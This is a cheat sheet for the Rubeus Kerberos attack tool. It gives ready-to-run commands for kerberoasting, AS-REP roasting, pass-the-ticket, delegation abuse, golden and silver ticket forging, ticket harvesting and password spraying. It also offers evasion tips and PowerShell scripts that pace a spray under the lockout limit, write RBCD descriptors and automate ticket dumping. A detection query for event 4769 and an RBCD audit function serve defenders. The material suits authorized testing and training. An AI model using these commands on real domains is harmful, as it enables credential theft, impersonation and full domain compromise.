
Rubeus Kerberos Interaction Tool Cheat Sheet


Overview

Rubeus is a C# toolset for raw Kerberos interaction and abuse. It is built for attacking Kerberos implementations and covers ticket requests, renewals and a range of Kerberos-based attacks. Rubeus is particularly useful in Active Directory penetration tests and red team operations.

Warning: This tool is intended only for authorized penetration testing and security assessments. Make sure you have proper authorization before using it in any environment.

Installation

Precompiled binary

# GhostPack publishes source and release tags only; the project states it will not release binaries, so a release-asset download URL does not exist.
# Compile from source (below) or obtain a build from a source you trust, then record the hash of the exact file you deploy
Get-FileHash Rubeus.exe -Algorithm SHA256

Compile from Source

# Clone repository
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus

# Compile with Visual Studio or MSBuild
msbuild Rubeus.sln /p:Configuration=Release /p:Platform="Any CPU"

# Output will be in Rubeus/bin/Release/

Alternative sources

Third-party binary collections ship prebuilt Rubeus.exe files. Treat them as unverified downloads: compare their SHA256 against a build you compiled yourself before running them, and keep the hash with your engagement notes.

Basic Usage

Command Structure

# Basic syntax
Rubeus.exe [command] [options]

# Get help
Rubeus.exe help

# Get help for specific command
Rubeus.exe [command] /help

Available Commands

| Command | Description |
|---|---|
| asktgt | Request a TGT (Ticket Granting Ticket) with a password, hash, AES key or certificate |
| asktgs | Request service tickets (TGS) for one or more SPNs using an existing TGT |
| renew | Renew a TGT (optionally keep renewing it) |
| s4u | Perform S4U2self / S4U2proxy (constrained and resource-based delegation abuse) |
| ptt | Pass-the-ticket: inject a ticket into the current or a specified logon session |
| purge | Purge tickets from the current (or, when elevated, a specified) logon session |
| describe | Describe the contents of a .kirbi ticket |
| klist | List tickets in the current or all logon sessions |
| dump | Dump tickets from memory (elevation needed for other users' sessions) |
| triage | Summarize tickets across logon sessions |
| monitor | Monitor for new TGTs (e.g. on an unconstrained-delegation host) |
| harvest | Harvest TGTs periodically and keep them renewed |
| brute | Password spraying / brute forcing via AS-REQs |
| kerberoast | Request service tickets for offline cracking |
| asreproast | Request AS-REPs for accounts that do not require pre-authentication |
| golden | Forge a TGT from the krbtgt key |
| silver | Forge a service ticket from a service account key |
| createnetonly | Start a process with a fresh netonly logon session, for use with ptt /luid |
| tgtdeleg | Retrieve a usable TGT for the current user without elevation |

Ticket Requests and Management

Request TGT (Ticket Granting Ticket)

# Request TGT with password
Rubeus.exe asktgt /user:username /password:password /domain:domain.com

# Request TGT with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com

# Request TGT with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com

# Request TGT for specific domain controller
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /dc:dc01.domain.com

Request TGS (Ticket Granting Service)

# Request a TGS for a specific service using a TGT (base64 blob or .kirbi path); asktgs always needs /ticket
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com

# No TGT in hand? Pull the current user's TGT via the Kerberos GSS-API delegation trick (no elevation needed) and use it with asktgs
Rubeus.exe tgtdeleg /nowrap

# Request TGS for multiple services in one run
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com,http/server.domain.com

# Request TGS with a specific encryption type (rc4, aes128, aes256)
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com /enctype:aes256

Ticket Management

# List tickets in the current logon session (all sessions when elevated)
Rubeus.exe klist

# Describe ticket contents (base64 blob or .kirbi path): service, realm, enctype, flags, validity
Rubeus.exe describe /ticket:base64ticket

# Purge all tickets from the current logon session
Rubeus.exe purge

# Purge tickets from a specific logon session (needs elevation)
Rubeus.exe purge /luid:0x12345

# Dump tickets from memory (elevation needed to read other users' sessions)
Rubeus.exe dump

# Dump tickets for a specific user
Rubeus.exe dump /user:username

Kerberoasting Attacks

Basic Kerberoasting

# Kerberoast every roastable account (users with an SPN, excluding krbtgt and disabled accounts)
Rubeus.exe kerberoast

# Kerberoast a specific account
Rubeus.exe kerberoast /user:serviceaccount

# kerberoast has no /enctype. /rc4opsec roasts only accounts that do not support AES and requests RC4 through tgtdeleg, so the traffic looks like a normal Windows client
Rubeus.exe kerberoast /rc4opsec

# /aes requests AES tickets instead of downgrading to RC4 (hashcat 19600/19700 instead of 13100: slower to crack, but the enctype does not stand out in 4769 events)
Rubeus.exe kerberoast /aes

# Kerberoast and save hashes to a file (hashcat format; /format:john for John the Ripper)
Rubeus.exe kerberoast /format:hashcat /outfile:kerberoast_hashes.txt

Advanced Kerberoasting

# Restrict the LDAP enumeration to one OU
Rubeus.exe kerberoast /ou:"OU=Service Accounts,DC=domain,DC=com"

# Kerberoast a specific (trusted) domain
Rubeus.exe kerberoast /domain:target.domain.com

# Use a specific domain controller for both the LDAP search and the TGS requests
Rubeus.exe kerberoast /dc:dc01.domain.com

# Roast as an enterprise principal (user@domain.com form) when the SPN does not resolve; /autoenterprise retries that way automatically on KDC_ERR_S_PRINCIPAL_UNKNOWN
Rubeus.exe kerberoast /spn:user@domain.com /enterprise /ticket:base64ticket
Rubeus.exe kerberoast /autoenterprise

Targeted Kerberoasting

# Kerberoast a specific SPN
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433

# Kerberoast a list of SPNs from a file (one per line)
Rubeus.exe kerberoast /spns:spns.txt

# Only roast accounts whose password was last set in a date range (MM-dd-yyyy). This is a pwdLastSet filter, not a policy bypass: old passwords are the likeliest to crack
Rubeus.exe kerberoast /pwdsetafter:01-01-2015 /pwdsetbefore:01-01-2020

# Kerberoast high-value targets. Rubeus ANDs /ldapfilter into its own (&(samAccountType=805306368)(servicePrincipalName=*)...) query, so pass just the inner clause without surrounding parentheses; adminCount=1 marks current or former protected-group members
Rubeus.exe kerberoast /ldapfilter:"admincount=1"
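What a Kerberoast run leaves on the domain controller, as an added example in PowerShell (not part of the original page or of Rubeus): each TGS-REQ above produces a Security event 4769, and an RC4 request carries TicketEncryptionType 0x17. The functions below pre-filter 4769 by XPath, parse the event XML, apply the usual roasting heuristic (RC4, successful, user service account rather than a machine account or krbtgt) and group by client address and requesting account. The sample event is constructed inline so the parsing and the heuristic can be exercised without a DC; dc01.domain.com is a placeholder, and 4769 only exists if "Audit Kerberos Service Ticket Operations" is enabled on the DC.

```powershell
# Added example, not Rubeus code: spot Kerberoasting in Security event 4769.
# Assumes a DC with "Audit Kerberos Service Ticket Operations" enabled and
# remote event-log access; dc01.domain.com is a placeholder.

function Parse-Event4769 {
    param([Parameter(Mandatory)][xml]$EventXml)
    # Flatten the <Data Name="..."> elements into a hashtable
    $d = @{}
    foreach ($n in $EventXml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    [pscustomobject]@{
        Time     = $EventXml.Event.System.TimeCreated.SystemTime
        Account  = $d['TargetUserName']
        Service  = $d['ServiceName']
        ClientIp = ($d['IpAddress'] -replace '^::ffff:', '')
        EncType  = $d['TicketEncryptionType']
        Status   = $d['Status']
    }
}

function Test-KerberoastIndicator {
    param([Parameter(Mandatory)]$Record)
    # RC4-HMAC (0x17) requested for a user service account (not a machine
    # account ending in $, not krbtgt) and issued successfully (Status 0x0).
    # In an AES-only estate this is near zero-noise; elsewhere baseline per ClientIp.
    ($Record.EncType -eq '0x17') -and
    ($Record.Status -eq '0x0') -and
    ($Record.Service -notmatch '\$$') -and
    ($Record.Service -ne 'krbtgt')
}

function Get-KerberoastCandidates {
    param([string]$DomainController = 'dc01.domain.com', [int]$Hours = 24)
    $ms = $Hours * 3600 * 1000
    # XPath pre-filter: only RC4 4769s inside the time window leave the DC
    $xpath = "*[System[EventID=4769 and TimeCreated[timediff(@SystemTime) <= $ms]] " +
             "and EventData[Data[@Name='TicketEncryptionType']='0x17']]"
    Get-WinEvent -ComputerName $DomainController -LogName Security -FilterXPath $xpath -ErrorAction Stop |
        ForEach-Object { Parse-Event4769 ([xml]$_.ToXml()) } |
        Where-Object { Test-KerberoastIndicator $_ } |
        Group-Object ClientIp, Account |
        Sort-Object Count -Descending |
        Select-Object Count, Name,
            @{ n = 'Services'; e = { ($_.Group.Service | Sort-Object -Unique) -join ',' } }
}

# Constructed sample 4769: RC4 ticket for svc_sql requested by jdoe from 10.0.0.25
$sample = [xml]@"
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4769</EventID><TimeCreated SystemTime="2024-01-01T10:00:00Z"/></System>
  <EventData>
    <Data Name="TargetUserName">jdoe@DOMAIN.COM</Data>
    <Data Name="ServiceName">svc_sql</Data>
    <Data Name="IpAddress">::ffff:10.0.0.25</Data>
    <Data Name="TicketEncryptionType">0x17</Data>
    <Data Name="Status">0x0</Data>
  </EventData>
</Event>
"@
$rec = Parse-Event4769 $sample
"{0} -> {1} ({2}) flagged: {3}" -f $rec.ClientIp, $rec.Service, $rec.EncType, (Test-KerberoastIndicator $rec)

# Live query against a DC:
# Get-KerberoastCandidates -DomainController dc01.domain.com -Hours 24
```

A single account requesting RC4 tickets for many distinct services in a short window is the shape a default `Rubeus.exe kerberoast` run produces; `/rc4opsec` and `/aes` are specifically meant to remove the 0x17 signal this query keys on, which is why the grouping by client address and service count is kept even for AES requests.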

AS-REP Roasting Attacks

Basic AS-REP Roasting

# AS-REP roast every enabled account with "Do not require Kerberos preauthentication" set (no credentials needed; from a non-domain host add /domain and /dc)
Rubeus.exe asreproast

# AS-REP roast a specific account
Rubeus.exe asreproast /user:username

# Save the hashes to a file
Rubeus.exe asreproast /outfile:asrep_hashes.txt

# Output format: john (default) or hashcat ($krb5asrep$23$..., hashcat mode 18200)
Rubeus.exe asreproast /format:hashcat

Advanced AS-REP Roasting

# AS-REP roast with an extra LDAP filter. Rubeus already selects accounts with DONT_REQ_PREAUTH (userAccountControl bit 4194304) and drops disabled ones, so only the extra clause is passed, without surrounding parentheses
Rubeus.exe asreproast /ldapfilter:"admincount=1"

# AS-REP roast a specific (trusted) domain
Rubeus.exe asreproast /domain:target.domain.com

# Use a specific domain controller
Rubeus.exe asreproast /dc:dc01.domain.com

# Run the LDAP enumeration with alternate credentials. /user selects the target account; /creduser (domain\user form) and /credpassword authenticate the LDAP search only, the AS-REQ itself needs no credentials
Rubeus.exe asreproast /creduser:domain.com\username /credpassword:password /domain:domain.com

Pass-the-Ticket (PTT) Attacks

Basic Pass-the-Ticket

# Pass-the-ticket with a base64 ticket
Rubeus.exe ptt /ticket:base64ticket

# Pass-the-ticket from a .kirbi file
Rubeus.exe ptt /ticket:ticket.kirbi

# Inject into a specific logon session (needs elevation)
Rubeus.exe ptt /ticket:base64ticket /luid:0x12345

# Keep the injected ticket out of your own session: createnetonly is a separate command that starts a process with a fresh netonly logon session and prints its LUID; inject into that LUID
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
Rubeus.exe ptt /ticket:base64ticket /luid:0x<LUID printed by createnetonly>

Verifying Injected Tickets

# Inspect a ticket before injecting it (service, realm, enctype, flags, validity)
Rubeus.exe describe /ticket:base64ticket

# Confirm the ticket landed in the target session (/luid needs elevation)
Rubeus.exe klist /luid:0x12345

# Remove it again when done
Rubeus.exe purge /luid:0x12345

S4U (Service for User) Attacks

S4U2self

# S4U2self only: obtain a service ticket to the service's own host impersonating a target user. /self stops after S4U2self; /altservice rewrites the sname, which is valid because the ticket is encrypted to the service account's key
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /self /altservice:cifs/server.domain.com /ptt

# Same with an AES key
Rubeus.exe s4u /user:serviceaccount /aes256:aeskey /impersonateuser:targetuser /self /altservice:cifs/server.domain.com /ptt

# Same with an existing TGT for the service account
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /self /altservice:cifs/server.domain.com /ptt

S4U2self + S4U2proxy

# Full chain: S4U2self for the impersonated user, then S4U2proxy to the SPN listed in the service account's msDS-AllowedToDelegateTo
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /ptt

# Substitute other service classes on the same host (same host key, so the KDC-issued ticket still validates); one ticket per class is produced
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http,ldap /ptt

# Start from an existing TGT for the service account
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http /ptt

Constrained Delegation Abuse

# Account with protocol transition (TrustedToAuthForDelegation): S4U2self works for any user that is not in Protected Users or marked "sensitive and cannot be delegated"
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com /ptt

# Account without protocol transition (Kerberos-only constrained delegation): S4U2self returns a non-forwardable ticket, so supply a forwardable service ticket for the impersonated user captured from a real login via /tgs and skip S4U2self
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /tgs:base64forwardableticket /msdsspn:cifs/dc01.domain.com /ptt

# Alternate service on the delegated host: ldap on a domain controller is enough for DCSync
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com /altservice:ldap /ptt

Golden and Silver Ticket Attacks

Golden Ticket Creation

# Create golden ticket
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519

# Create golden ticket with AES
Rubeus.exe golden /aes256:krbtgtaeskey /user:administrator /domain:domain.com /sid:S-1-5-21-...

# Create golden ticket with specific groups
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /groups:512,513,518,519,520

Silver Ticket Creation

# Forge a service ticket with the key of the account that owns the SPN (the machine account for cifs/host). The domain SID is required: pass /sid, or /ldap to pull it and the user's attributes from AD
Rubeus.exe silver /rc4:servicehash /user:administrator /service:cifs/server.domain.com /domain:domain.com /sid:S-1-5-21-...

# Silver ticket with an AES key
Rubeus.exe silver /aes256:serviceaeskey /user:administrator /service:cifs/server.domain.com /domain:domain.com /sid:S-1-5-21-...

# Silver ticket for a specific SPN (here the SQL service account's key)
Rubeus.exe silver /rc4:servicehash /user:administrator /service:MSSQLSvc/sql01.domain.com:1433 /domain:domain.com /sid:S-1-5-21-...

Ticket Harvesting and Monitoring

Ticket Harvesting

# Harvest TGTs from all logon sessions every 30 seconds and keep them renewed (needs elevation; /interval is required)
Rubeus.exe harvest /interval:30

# Stop after a fixed run time (seconds) and print tickets unwrapped for copy-paste
Rubeus.exe harvest /interval:30 /runfor:3600 /nowrap

# Harvest only a specific user's tickets
Rubeus.exe harvest /interval:30 /targetuser:administrator

# harvest has no /outfile; redirect the console output instead
Rubeus.exe harvest /interval:30 /runfor:3600 /nowrap > harvested_tickets.txt

Ticket Monitoring

# Monitor for new TGTs (default interval 60 seconds; needs elevation; typically run on an unconstrained-delegation host)
Rubeus.exe monitor

# Monitor with a specific interval (seconds)
Rubeus.exe monitor /interval:60

# Only report tickets for a specific user (e.g. a DC machine account arriving via coerced authentication)
Rubeus.exe monitor /interval:5 /filteruser:DC01$

# Also write the console output to a file (monitor has no /outfile)
Rubeus.exe monitor /interval:60 /consoleoutfile:monitored_tickets.txt

Ticket Triage

# Triage tickets in the current logon session (all sessions when elevated)
Rubeus.exe triage

# Triage tickets for a specific user
Rubeus.exe triage /user:administrator

# Triage a specific logon session
Rubeus.exe triage /luid:0x12345

# Show only tickets for a given service; krbtgt lists the TGTs
Rubeus.exe triage /service:krbtgt

Password Attacks

Password Spray

# Spray one password. Without /users Rubeus enumerates enabled users over LDAP, so this needs a domain context or /creduser; /noticket discards the TGTs of valid hits
Rubeus.exe brute /password:Password123 /noticket

# Try a list of passwords (one per line). Every failure increments badPwdCount: check lockoutThreshold and the observation window before running this
Rubeus.exe brute /passwords:passwords.txt /noticket

# Spray a fixed user list (no LDAP enumeration)
Rubeus.exe brute /users:users.txt /password:Password123 /noticket

# Target a specific domain and domain controller
Rubeus.exe brute /password:Password123 /domain:domain.com /dc:dc01.domain.com /noticket
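The lockout check the comments above ask for, as an added PowerShell example (not Rubeus code): `Get-DomainLockoutPolicy` reads lockoutThreshold, lockOutObservationWindow and lockoutDuration from the domain head object (these intervals are stored as negative Int64 counts of 100 ns, with Int64.MinValue meaning "never"), and `Get-SprayPlan` turns them into a password-per-window budget. Fine-grained password policies (PSOs) can override the domain policy per user and are not read here; the function names are this example's own, and the domain defaults to the current one.

```powershell
# Added example, not Rubeus code: read the domain lockout policy and size a spray
# so badPwdCount never reaches lockoutThreshold. PSOs are not considered.

function Get-SprayPlan {
    param(
        [Parameter(Mandatory)][int]$LockoutThreshold,        # 0 = no lockout
        [Parameter(Mandatory)][double]$ObservationWindowMin, # minutes until badPwdCount resets
        [int]$SafetyMargin = 1                                # attempts kept in reserve
    )
    if ($LockoutThreshold -eq 0) {
        return [pscustomobject]@{ PasswordsPerWindow = [int]::MaxValue; WaitMinutes = 0; Note = 'no lockout policy' }
    }
    $per = $LockoutThreshold - $SafetyMargin
    if ($per -lt 1) { $per = 1 }
    [pscustomobject]@{
        PasswordsPerWindow = $per
        WaitMinutes        = $ObservationWindowMin
        Note               = "at most $per password(s) per user, then wait $ObservationWindowMin minutes before the next round"
    }
}

function Get-DomainLockoutPolicy {
    param([string]$Domain = $env:USERDNSDOMAIN)
    $dn   = ($Domain -split '\.' | ForEach-Object { "DC=$_" }) -join ','
    $root = [ADSI]"LDAP://$dn"
    # Durations are negative Int64 intervals of 100 ns; Int64.MinValue means "never unlock"
    function ConvertTo-Minutes($large) {
        $v = $root.ConvertLargeIntegerToInt64($large)
        if ($v -eq [int64]::MinValue) { return [double]::PositiveInfinity }
        [math]::Abs($v) / 600000000.0
    }
    [pscustomobject]@{
        LockoutThreshold     = [int]$root.lockoutThreshold.Value
        ObservationWindowMin = ConvertTo-Minutes $root.lockOutObservationWindow.Value
        LockoutDurationMin   = ConvertTo-Minutes $root.lockoutDuration.Value
        MinPwdLength         = [int]$root.minPwdLength.Value
    }
}

# Offline check with a common policy (threshold 5, 30-minute window):
Get-SprayPlan -LockoutThreshold 5 -ObservationWindowMin 30

# Live:
# $pol = Get-DomainLockoutPolicy
# Get-SprayPlan $pol.LockoutThreshold $pol.ObservationWindowMin
# then one Rubeus.exe brute /users:users.txt /password:<pw> /noticket per window
```

Pinning a DC with `/dc` does not buy extra budget: every DC forwards failed pre-authentication to the PDC emulator, which keeps the authoritative badPwdCount, so the plan above applies to the domain as a whole, not per DC.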

Credential Validation

# Validate credentials: "[+] TGT request successful!" proves the password, KDC_ERR_PREAUTH_FAILED disproves it, and each failure counts against lockout. /nowrap prints the TGT on one line without caching it
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /nowrap

# Validate an NTLM hash (RC4 pre-authentication; conspicuous in a domain that enforces AES)
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com /nowrap

# Validate an AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com /nowrap

# /getcredentials applies to PKINIT: with a certificate it follows up with a U2U request and recovers the account's NTLM hash (/password here is the PFX password)
Rubeus.exe asktgt /user:username /certificate:user.pfx /password:pfxpassword /domain:domain.com /getcredentials /nowrap

Advanced Techniques

Cross-Domain Attacks

# TGT in the child domain
Rubeus.exe asktgt /user:username /password:password /domain:child.domain.com /dc:dc01.child.domain.com

# Inter-realm referral TGT for the parent realm (a TGS for krbtgt/<parent>), usable to request service tickets in the parent
Rubeus.exe asktgs /ticket:base64ticket /service:krbtgt/parent.domain.com /dc:dc01.child.domain.com

# Golden ticket in the child with the parent's Enterprise Admins SID injected as SID history; works across parent-child trusts because SID filtering is not applied inside a forest
Rubeus.exe golden /rc4:childkrbtgthash /user:administrator /domain:child.domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519

Unconstrained Delegation Abuse

# On a host with unconstrained delegation, watch for TGTs of incoming accounts (e.g. a DC machine account after coerced authentication); needs elevation
Rubeus.exe monitor /interval:5 /filteruser:DC01$ /nowrap

# Or extract delegated TGTs already cached on the host
Rubeus.exe dump /service:krbtgt /nowrap

# Inject the captured TGT (a DC machine-account TGT is enough for DCSync via ldap)
Rubeus.exe ptt /ticket:extractedtgt

Resource-Based Constrained Delegation

# Abuse RBCD: the controlled account is listed in the target's msDS-AllowedToActOnBehalfOfOtherIdentity, so S4U2self + S4U2proxy yields service tickets to the target for any non-protected user
Rubeus.exe s4u /user:controlledaccount /rc4:hash /impersonateuser:administrator /msdsspn:host/target.domain.com /altservice:cifs,http,ldap /ptt

# The controlled account is usually a computer account: any user can create up to ms-DS-MachineAccountQuota (default 10) of them and therefore knows their password; /rc4 is that password's NTLM hash
Rubeus.exe s4u /user:COMPUTER$ /rc4:computerhash /impersonateuser:administrator /msdsspn:host/target.domain.com /ptt
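The attribute the RBCD commands above depend on, as an added PowerShell example (System.DirectoryServices and System.Security.AccessControl, not Rubeus code): `Get-RbcdDelegators` decodes msDS-AllowedToActOnBehalfOfOtherIdentity on a target computer object so a defender can see who may already delegate to the host, `Set-RbcdDelegator` writes a descriptor granting that right to the account you control (the prerequisite for `s4u`, and it needs write access to the target object), and `Clear-RbcdDelegators` removes it again for clean-up. Distinguished names and SIDs are placeholders; `Test-RbcdSddl` round-trips the descriptor without touching AD.

```powershell
# Added example, not Rubeus code: audit, set and clear msDS-AllowedToActOnBehalfOfOtherIdentity.
# Writing requires write access to the target computer object (e.g. GenericWrite or
# ownership because your account created it). DNs and SIDs are placeholders.

function New-RbcdDescriptorBytes([string]$DelegatorSid) {
    # Full-control ACE for the delegator in SDDL; GetBinaryForm yields the bytes AD stores
    $sd    = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$DelegatorSid)"
    $bytes = New-Object byte[] $sd.BinaryLength
    $sd.GetBinaryForm($bytes, 0)
    $bytes
}

function Get-RbcdDelegators {
    param([Parameter(Mandatory)][string]$TargetDN)   # e.g. 'CN=TARGET,OU=Servers,DC=domain,DC=com'
    $target = [ADSI]"LDAP://$TargetDN"
    $raw = $target.Properties['msDS-AllowedToActOnBehalfOfOtherIdentity'].Value
    if (-not $raw) { return @() }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList ([byte[]]$raw), 0
    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid  = $ace.SecurityIdentifier
        $name = '<unresolved>'
        try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { }
        [pscustomobject]@{ Principal = $name; Sid = $sid.Value; AceType = $ace.AceType }
    }
}

function Set-RbcdDelegator {
    param(
        [Parameter(Mandatory)][string]$TargetDN,
        [Parameter(Mandatory)][string]$DelegatorSid   # SID of the account or computer you control
    )
    $target = [ADSI]"LDAP://$TargetDN"
    # This REPLACES any existing descriptor: record Get-RbcdDelegators output first and restore it afterwards
    $target.Properties['msDS-AllowedToActOnBehalfOfOtherIdentity'].Value = New-RbcdDescriptorBytes $DelegatorSid
    $target.CommitChanges()
}

function Clear-RbcdDelegators {
    param([Parameter(Mandatory)][string]$TargetDN)
    $target = [ADSI]"LDAP://$TargetDN"
    $target.Properties['msDS-AllowedToActOnBehalfOfOtherIdentity'].Clear()
    $target.CommitChanges()
}

function Test-RbcdSddl([string]$DelegatorSid) {
    # Offline check: the SID written into the descriptor is the SID read back from its bytes
    $bytes = New-RbcdDescriptorBytes $DelegatorSid
    $back  = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $bytes, 0
    $back.DiscretionaryAcl[0].SecurityIdentifier.Value -eq $DelegatorSid
}

Test-RbcdSddl 'S-1-5-21-1004336348-1177238915-682003330-1001'
# Live:
# Get-RbcdDelegators -TargetDN 'CN=TARGET,OU=Servers,DC=domain,DC=com'
# Set-RbcdDelegator -TargetDN 'CN=TARGET,OU=Servers,DC=domain,DC=com' -DelegatorSid 'S-1-5-21-...-1105'
```

With the ACE in place, the `Rubeus.exe s4u /user:COMPUTER$ /rc4:computerhash /impersonateuser:administrator /msdsspn:host/target.domain.com /ptt` command above completes the chain. On the defensive side, the write shows up as a directory object modification (event 5136 when object auditing is enabled), and `Get-RbcdDelegators` over all computer objects is the periodic check for descriptors nobody remembers creating.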

Evasion Techniques

OPSEC Considerations

# Blend in with Windows clients: /rc4opsec roasts only accounts without AES via tgtdeleg; /aes requests AES tickets so the enctype does not stand out in 4769 events (kerberoast has no /enctype)
Rubeus.exe kerberoast /rc4opsec
Rubeus.exe kerberoast /aes

# Spread requests out: milliseconds between TGS-REQs, with a percentage of jitter
Rubeus.exe kerberoast /delay:5000 /jitter:30

# Pin a specific domain controller (keeps the events on one DC)
Rubeus.exe kerberoast /dc:dc02.domain.com

# Limit requests to the SPNs you actually need
Rubeus.exe kerberoast /spn:specific/service.domain.com

Stealth Operations

# Keep a requested TGT out of the LSA cache: print it (/nowrap) instead of injecting it (/ptt) and pass it to later commands with /ticket
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /nowrap

# Mimic a real Windows client's request flow (AES etypes, pre-auth sequence); /opsec requires AES and is also available on s4u
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /enctype:aes256 /opsec /nowrap

# Substitute the service class on an existing S4U ticket instead of requesting separate tickets per service
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:user /msdsspn:cifs/server.domain.com /altservice:host

Integration with Other Tools

Mimikatz Integration

# Rubeus prints tickets as base64 .kirbi blobs; dump has no /outfile, so print them unwrapped and write the one you need to disk
Rubeus.exe dump /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64 blob from Rubeus>"))

# Inject it with Mimikatz (kerberos::ptt takes .kirbi files; kerberos::ptc is for ccache files)
mimikatz # kerberos::ptt ticket.kirbi

Impacket Integration

# Convert the .kirbi to a ccache, then point Impacket at it. The target must be given by the FQDN in the ticket's SPN and the clock skew limit still applies
python3 ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k -no-pass domain.com/administrator@target.domain.com

Cobalt Strike Integration

# Cobalt Strike beacon commands
beacon> execute-assembly Rubeus.exe kerberoast
beacon> execute-assembly Rubeus.exe asreproast
beacon> execute-assembly Rubeus.exe dump

Automation Scripts

Global Kerberos Assessment

# Comprehensive Kerberos assessment script
param(
    [string]$Domain = $env:USERDOMAIN,
    [string]$OutputPath = "C:\Temp\KerberosAssessment"
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting comprehensive Kerberos assessment for $Domain"

# Kerberoasting
Write-Host "[+] Performing Kerberoasting..."
& Rubeus.exe kerberoast /outfile:"$OutputPath\kerberoast.txt" /domain:$Domain

# AS-REP Roasting
Write-Host "[+] Performing AS-REP Roasting..."
& Rubeus.exe asreproast /outfile:"$OutputPath\asreproast.txt" /domain:$Domain

# Ticket triage
Write-Host "[+] Triaging current tickets..."
& Rubeus.exe triage|Out-File "$OutputPath\ticket_triage.txt"

# Dump tickets
Write-Host "[+] Dumping tickets..."
& Rubeus.exe dump|Out-File "$OutputPath\ticket_dump.txt"

Write-Host "[+] Assessment complete. Results saved to $OutputPath"

Automated Ticket Harvesting

# Periodic ticket-collection script. Rubeus harvest already loops on its own (/interval, /runfor) and would never
# return to this loop, so each round takes a point-in-time snapshot with dump instead
param(
    [int]$Interval = 300,  # seconds between rounds (5 minutes)
    [string]$OutputPath = "C:\Temp\TicketHarvest",
    [int]$Duration = 3600  # total run time in seconds (1 hour)
)

New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

$endTime = (Get-Date).AddSeconds($Duration)
$iteration = 1

Write-Host "[+] Starting ticket collection for $Duration seconds"

while ((Get-Date) -lt $endTime) {
    $timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
    $outputFile = Join-Path $OutputPath "harvest_${iteration}_$timestamp.txt"

    Write-Host "[+] Iteration $iteration - dumping tickets..."
    # /nowrap keeps each base64 ticket on one line so it can be pasted straight back into ptt
    & Rubeus.exe dump /nowrap | Out-File $outputFile

    Write-Host "[+] Tickets saved to $outputFile"

    if ((Get-Date) -lt $endTime) {
        Write-Host "[+] Waiting $Interval seconds..."
        Start-Sleep -Seconds $Interval
    }

    $iteration++
}

Write-Host "[+] Ticket collection complete"

Domain Reconnaissance Script

# Domain reconnaissance with Rubeus. $Password is passed on the command line, so it lands in PowerShell history
# and in process-creation events (4688 with command-line auditing); clear both afterwards
param(
    [string]$Domain,
    [string]$Username,
    [string]$Password,
    [string]$OutputPath = "C:\Temp\DomainRecon"
)

New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Starting domain reconnaissance for $Domain"

# Test credentials: Rubeus prints "[+] TGT request successful!" on a valid AS-REQ and KDC_ERR_PREAUTH_FAILED otherwise
# (one failed attempt counts against lockout)
Write-Host "[+] Testing credentials..."
$credTest = & Rubeus.exe asktgt /user:$Username /password:$Password /domain:$Domain /nowrap
$credTest | Out-File "$OutputPath\credential_test.txt"

if ($credTest -match "TGT request successful") {
    Write-Host "[+] Credentials valid, continuing reconnaissance..."

    # /creduser needs the domain\user form; it authenticates the LDAP enumeration, not the roast itself
    Write-Host "[+] Kerberoasting with credentials..."
    & Rubeus.exe kerberoast "/creduser:$Domain\$Username" /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\kerberoast_creds.txt"

    Write-Host "[+] AS-REP Roasting with credentials..."
    & Rubeus.exe asreproast "/creduser:$Domain\$Username" /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\asreproast_creds.txt"

    Write-Host "[+] Reconnaissance complete"
} else {
    Write-Host "[-] Credentials invalid, stopping reconnaissance"
}

Troubleshooting

Common Issues

# Clock skew: Kerberos tolerates 5 minutes by default (KRB_AP_ERR_SKEW beyond that). Measure the offset against the DC before forcing a resync
